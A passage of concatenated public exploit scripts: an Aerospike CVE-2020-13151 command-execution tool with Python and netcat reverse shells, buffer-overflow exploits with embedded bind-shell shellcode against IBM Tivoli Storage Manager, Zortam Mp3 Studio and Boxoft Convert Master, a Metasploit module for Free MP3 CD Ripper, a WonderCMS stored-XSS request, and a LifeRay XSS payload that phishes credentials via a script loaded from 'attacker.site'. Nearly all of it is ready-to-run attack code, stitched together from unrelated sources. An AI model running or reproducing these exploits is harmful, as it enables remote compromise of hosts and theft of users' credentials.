    The record key and its single bin value are both ``cfg.dummystring``.
    On any write failure the script prints the error, best-effort lists the
    namespaces the server knows about (only when the error text starts with
    'Invalid namespace'), and exits with status 13.
    """
    ns = cfg.namespace
    setname = cfg.setname
    print(f"[+] writing to {ns}.{setname}")
    try:
        rec = cfg.dummystring
        client.put((ns, setname, rec), {'pk':cfg.dummystring})
        print(f"[+] wrote {rec}")
    except Exception as e:
        # `e.msg` presumes an aerospike exception type — TODO confirm
        print(f"[-] unable to write record: {e.msg}")
        try:
            if e.msg.startswith('Invalid namespace'):
                print("Valid namespaces: ")
                # _info_parse returns [] on failure, so .split() raises here and
                # lands in the bare except below — the listing is best-effort only.
                for n in _info_parse("namespaces", client).split(";"):
                    print(n.strip())
        except:
            pass  # deliberate: the namespace hint must never mask the real error
        sys.exit(13)
def _info_parse(k, client):
    """Return the value of info key ``k`` from the first node in ``client.info_all``.

    ``info_all`` is assumed to map node -> (err, value) pairs; only ``[1]`` of the
    first entry is returned — TODO confirm against the client API.

    On failure this prints a message and returns ``[]`` (a list, not a str);
    callers that ``.split()`` the result rely on their own exception handling.
    """
    try:
        return [i[1] for i in client.info_all(k).values() ][0]
    except Exception as e:
        # `e.msg` presumes an aerospike exception type — TODO confirm
        print(f"error retrieving information: {e.msg}")
        return []
def _is_vuln(_mj, _mi, _pt, _bd):
    """Return True when build ``major.minor.patch.build`` is older than 5.1.0.0.

    The comparison is lexicographic over the four components, which is exactly
    what the per-component walk (lower -> vulnerable, equal -> keep going,
    higher -> patched) computes.

    NOTE(review): the advisory header lists the affected range as "< 5.1.0.3",
    but this helper compares against 5.1.0.0, so 5.1.0.1 and 5.1.0.2 are
    reported as patched — worth confirming before relying on it for inventory.
    """
    first_fixed = (5, 1, 0, 0)
    observed = (_mj, _mi, _pt, _bd)
    return observed < first_fixed
def _version_check(client):
    """Print the server build string and exit(0) if _is_vuln() says it is patched.

    The build string is expected to have exactly four dot-separated integers;
    anything else (including the ``[]`` that _info_parse returns on failure)
    raises inside the try, is reported, and the caller continues regardless.
    ``sys.exit`` raises SystemExit, which is not an ``Exception`` subclass, so the
    "patched" exit is not swallowed by the except clause.
    """
    print("[+] aerospike build info: ", end="")
    try:
        _ver = _info_parse("build", client)
        print(_ver)
        mj, mi, pt, bd = [int(i) for i in _ver.split('.')]
        if _is_vuln(mj, mi, pt, bd):
            print("[+] looks vulnerable")
            return
        else:
            print(f"[-] this instance is patched.")
            sys.exit(0)
    except Exception as e:
        print(f"[+] unable to interpret build number due to {e}")
        print("[+] continuing anyway... ")
def _exploit(cfg):
    """Drive the full sequence: connect, version check, dummy record, UDF upload, command.

    Returns silently when no client could be obtained. After the UDF is registered,
    a reverse shell is sent when ``cfg.pythonshell`` or ``cfg.netcatshell`` is set
    (python template takes precedence when both are), and ``cfg.cmd`` is sent
    afterwards when present — the two are not mutually exclusive.
    """
    client = _get_client(cfg)
    if not client:
        return
    _version_check(client)
    print(f"[+] populating dummy table.")
    _populate_table(client, cfg)
    print(f"[+] registering udf")
    _register_udf(client, cfg)
    if cfg.pythonshell or cfg.netcatshell:
        sys.stdout.flush()
        print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="")
        sys.stdout.flush()
        # four one-second ticks are purely a visual countdown for the operator
        for i in range(4):
            print(".", end="")
            sys.stdout.flush()
            sleep(1)
        print(".")
        _send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) )
    if cfg.cmd:
        print(f"[+] issuing command \"{cfg.cmd}\"")
        _send(client, cfg, cfg.cmd)
# Entry point: parse arguments, fill in defaults, validate the combination, run.
if __name__ == '__main__':
    if len(sys.argv) == 1:
        print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000")
        print("... or ... ")
        print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'")
        sys.exit(0)
    parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC')
    parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1")
    parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int)
    parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test")
    parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None)
    parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None)
    parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true")
    parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true")
    parser.add_argument("--lhost", help="host to use for reverse shell callback")
    parser.add_argument("--lport", help="port to use for reverse shell callback")
    parser.add_argument("--cmd", help="custom command to issue against the underlying host")
    parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None)
    cfg = parser.parse_args()
    # Defaults are applied after parsing rather than via argparse `default=`
    # because the random key and the cwd-relative path are computed at runtime.
    if not cfg.setname:
        cfg.setname = 'cve202013151'
    if not cfg.dummystring:
        cfg.dummystring = _random_string(16)
    if not cfg.udfpath:
        cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua')
    # Argument validation via assert: note these checks vanish under `python -O`.
    assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport"
    if cfg.pythonshell or cfg.netcatshell:
        assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell"
    _exploit(cfg)
# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
# Exploit Author: Paolo Stagno aka VoidSec
# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
# Version: 5.2.0.1
# Tested on: Windows 10 Pro v.10.0.19041 Build 19041
"""
Usage: IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"
PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1
PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe"
FileName : dsmadmc.exe
ARCH : I386
DotNET : False
ASLR : True
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : False
ControlFlowGuard : False
HighentropyVA : False
"""
# [ buffer ]
# [ 68 byte | EIP | rest of the buffer ]
# ^_ESP
"""
EIP contains normal pattern : 0x33634132 (offset 68)
ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)
JMP ESP Pointers:
0x028039eb : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02803d7b : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02852c21 : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fbe3 : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fd2f : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x028823a9 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
"""
#!/usr/bin/python
import struct
# 4000 bytes
# Total size of the generated buffer. NOTE: the "# 4000 bytes" comment above
# disagrees with the value actually used (800); the value is what the padding
# below is computed from.
buff_max_length=800
# Bytes of filler before the saved return address (matches "offset 68" in the
# pattern analysis quoted above).
eip_offset=68
"""
BAD CHARS: \x00\x08\x09\x0a\x0d\x1a\x1b\x7f
GOOD CHARS:
asciiprint \x20-\x7e
MOD CHARS:
\x00 -> \x20
,-----------------------------------------------.
| Comparison results: |
|-----------------------------------------------|
| 80 81 82 83 84 85 86 87| File
| 3f 3f 2c 9f 2c 2e 2b d8| Memory
80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File
|5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory
90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File
|7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory
a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File
|22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory
b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File
|2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory
c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File
|45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory
d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File
|4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory
e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File
|8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory
f0 |f8 f9 fa fb fc fd fe ff | File
|6f 97 a3 96 81 79 5f 98 | Memory
`-----------------------------------------------'
"""
# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
shellcode = b""
shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78"
shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54"
shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f"
shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b"
shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e"
shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30"
shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42"
shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f"
shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54"
shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34"
shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31"
shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61"
shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35"
shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f"
shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39"
shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d"
shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53"
shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b"
shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c"
shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c"
shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53"
shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c"
shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38"
shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58"
shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49"
shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69"
shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b"
shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72"
shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d"
shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c"
shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76"
shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75"
shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31"
shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f"
shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d"
shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77"
shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79"
shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58"
shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33"
shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63"
shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51"
shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58"
shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63"
shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48"
shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54"
shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42"
shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69"
shellcode += b"\x6f\x50\x55\x54\x48\x41\x41"
# Layout: [ eip_offset x 'A' | return address | shellcode | 'C' padding to buff_max_length ].
# Mixing a str (`buff`) with the bytes object `shellcode` only works on Python 2,
# where the two types are the same; the `#!/usr/bin/python` line above is
# consistent with that. On Python 3 the `+= shellcode` line raises TypeError.
buff = ""
buff += "A" * eip_offset
buff += struct.pack("<I",0x02c73d7b) # 0x02803d7b cause char modification needs to be written as 0x02c73d7b
buff += shellcode
buff += "C" * (buff_max_length - len(buff))
print("Writing {} bytes".format(len(buff)))
# Text mode ("w") is used; the author's bad-char list excludes \x0a and \x0d,
# which is presumably why newline translation is not a concern here — confirm.
f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w")
f.write(buff)
f.close()
# Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
# Date: 20-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.wondercms.com/
# Version: 3.1.3
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29233
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
Attack vector:
This vulnerability allows an attacker to inject an XSS payload into the Page description; each time any user visits the website, the XSS triggers and the attacker is able to steal the cookie, depending on the crafted payload.
Vulnerable Parameters: Page description.
Steps-To-Reproduce:
1. Go to the Simple website builder.
2. Put this payload in Page description: "hemantsolo"><img src=x onerror=confirm(1)>"
3. Now go to the website and the XSS will be triggered.
POST /demo/ HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 196
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: 127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 127.0.0.1/demo/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: PHPSESSID=da4eae35135fd9ce3c413b936e2e5925
fieldname=description&token=c526c8235770f7efe7b7868a806f51f9a48545e117e00534e5cd82fde1bf1064&content=HemantSoloHacker%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E&target=pages&menu=&visibility=
# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
# Date: November 19, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: https://www.zortam.com/index.html
# Software Link: https://www.zortam.com/download.html
# Version: 27.60
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041
# Steps to reproduce crash:
# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
# 2) Open Zortam_Crash.txt output file
# 3) Copy contents of text file to clipboard
# 4) Open Zortam Mp3 Studio
# 5) From the Menu bar -> File -> New Library
# 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’
# 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field
# 8) Click 'OK'
# 9) Connect to victim machine on port 80
#!/usr/bin/perl
# File layout written below: [ 268 bytes (label + NOP fill) | NSEH | SEH | 12 NOPs | payload ].
$baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)
$baddata .= "\x90" x (268-length($baddata)); # exact overwrite at 272
$nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled
# 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
# (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL)
# Little-endian encoding of the 0x10015962 gadget address listed above; the
# gadget lives in a third-party DLL that the author reports as lacking ASLR/SafeSEH,
# which is the property a fix on the vendor side would need to change.
$seh = "\x62\x59\x01\x10"; # seh overwrite
$nop = "\x90" x 12; # NOP sled
# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh
# Payload size: 355 bytes
$payload =
"\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" .
"\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" .
"\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" .
"\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" .
"\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" .
"\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" .
"\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" .
"\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" .
"\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" .
"\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" .
"\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" .
"\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" .
"\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" .
"\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" .
"\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" .
"\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" .
"\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" .
"\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" .
"\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" .
"\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" .
"\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" .
"\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" .
"\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" .
"\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" .
"\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" .
"\x9b\xec\xb0\xa9\x89";
$file = "Zortam_Crash.txt";
# open() repeats the literal filename instead of $file and does not check for failure.
open (FILE, '>Zortam_Crash.txt');
print FILE $baddata;
print FILE $nseh;
print FILE $seh;
print FILE $nop;
print FILE $payload;
close (FILE);
print "Exploit file created [" . $file . "]\n";
# NOTE: this reports only length($baddata) (268), not the size of the whole
# file, which also includes $nseh, $seh, $nop and $payload.
print "Buffer size: " . length($baddata) . "\n";
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# File-format module: it only writes a crafted media file to disk (Msf::Exploit::FILEFORMAT);
# the overflow is triggered when a user converts that file in the application.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  # Module metadata: name, references, the single target (with its POP/POP/RET
  # address) and the payload bad-chars, plus the FILENAME option.
  def initialize(info={})
    super(update_info(info,
      'Name' => "Free MP3 CD Ripper 2.6 < 2.8 (.wma.wav.flac.m3u.acc) Buffer Overflow",
      'Description' => %q{
        This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8.
        By constructing a specially crafted WMA WAV M3U ACC FLAC file and attempting to convert it to an MP3 file in the
        application, a buffer is overwritten, which allows for running shellcode.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Gionathan Reale', # Exploit-DB POC
          'ZwX' # Metasploit Module
        ],
      'References' =>
        [
          [ 'CVE', '2019-9767' ],
          [ 'EDB', '45412' ],
          [ 'URL', 'https://www.exploit-db.com/exploits/45412' ]
        ],
      'Platform' => 'win',
      'Targets' =>
        [
          [
            'Windows 7 x86 - Windows 7 x64',
            {
              'Ret' => 0x66e42121 # POP POP RET
            }
          ]
        ],
      'Payload' =>
        {
          'BadChars' => "\x00\x0a\x0d\x2f"
        },
      'Privileged' => false,
      'DisclosureDate' => "Sep 09 2018",
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'Create malicious file example extension (.wma .wav .acc .flac .m3u)', 'name.wma'])
      ])
  end

  # Builds the file body: [ 4116 NOPs | NSEH short jump | SEH = target.ret | encoded payload | 4440 NOPs ].
  # The NSEH bytes are \xeb\x06 followed by two random alpha bytes (filtered
  # against the payload's bad chars); target.ret is packed little-endian ("V*").
  def exploit
    file_payload = payload.encoded
    msfsploit = make_fast_nops(4116)
    msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP
    msfsploit << [target.ret].pack("V*") # SEH
    msfsploit << file_payload
    msfsploit << make_fast_nops(4440)
    file_create(msfsploit)
  end
end
# Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit
# Date: 17.09.2020
# Vendor Homepage: http://www.boxoft.com/
# Software Link: http://www.boxoft.com/convert-master/setup(boxoft-conver=t-master).exe
# Exploit Author: Achilles
# Tested Version: 1.3.0
# Tested on: Windows 7 x64
# 1.- Run python code :Boxoft_Convert_Master.py
# 2.- Open Boxoft_Convert_Master.exe
# 3.- Click try and Batch Convert Mode
# 4.- Add Evil.wav
# 5.- And you will have a bind shell port 4444
# 6.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/env python
import struct
# Layout of the .wav written below: [ 4132 x 'A' | NSEH | SEH | 20 NOPs | shellcode ].
buffer = "\x41" * 4132
nseh = "\xeb\x06\x90\x90" #jmp short 6
# Little-endian ('<L') encoding of the handler address in CDRip122.dll; the
# address is only usable while that DLL loads at its preferred base.
seh = struct.pack('<L',0x6d00c683) #CDRip122.dll
nops = "\x90" * 20
#Bind=shellcode port 4444
shellcode = ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33"
"\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
"\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
"\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
"\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
"\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
"\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
"\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
"\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
"\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
"\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
"\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
"\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
"\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
"\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
"\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
"\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
"\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
"\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
"\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
"\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
"\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
"\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
"\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
"\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
"\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
"\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
"\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
"\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
"\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
"\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
"\xc8\x28\x1b\xd5\x3f\x51")
# Python 2 only: `print` is used as a statement and str/bytes are the same type.
payload = buffer + nseh + seh + nops + shellcode
try:
    f=open("Evil.wav","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    # Bare except: the real reason (permissions, path) is discarded; only a
    # generic message is shown, so a failure here needs manual diagnosis.
    print "File cannot be created"
# Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS
# Date: 10/05/2020
# Exploit Author: 3ndG4me
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://www.liferay.com/
# Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED)
# Tested on: Debian Linux
# CVE : CVE-2020-7934
# Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934
# NOTE: The attached proof of concept is a javascript payload,
submitted as a ".txt" file, because attaching it via email as ".js" is often
blocked.
// CVE-2020-7934 Cred Phishing Example Attack
// Author: 3ndG4me
// Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934
// Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant:
// <SCRIPT SRC="//attacker.site/cve-2020-7934.js">
// Two native prompt() dialogs collect the values; nothing validates them and the
// wording leans on the trust users place in browser-native dialogs, which is
// why a stored-XSS sink on a trusted origin is what makes this convincing.
var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", "");
var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", "");
// Echoed to the developer console — also the quickest place a defender can spot this running.
console.log(email);
console.log(password);
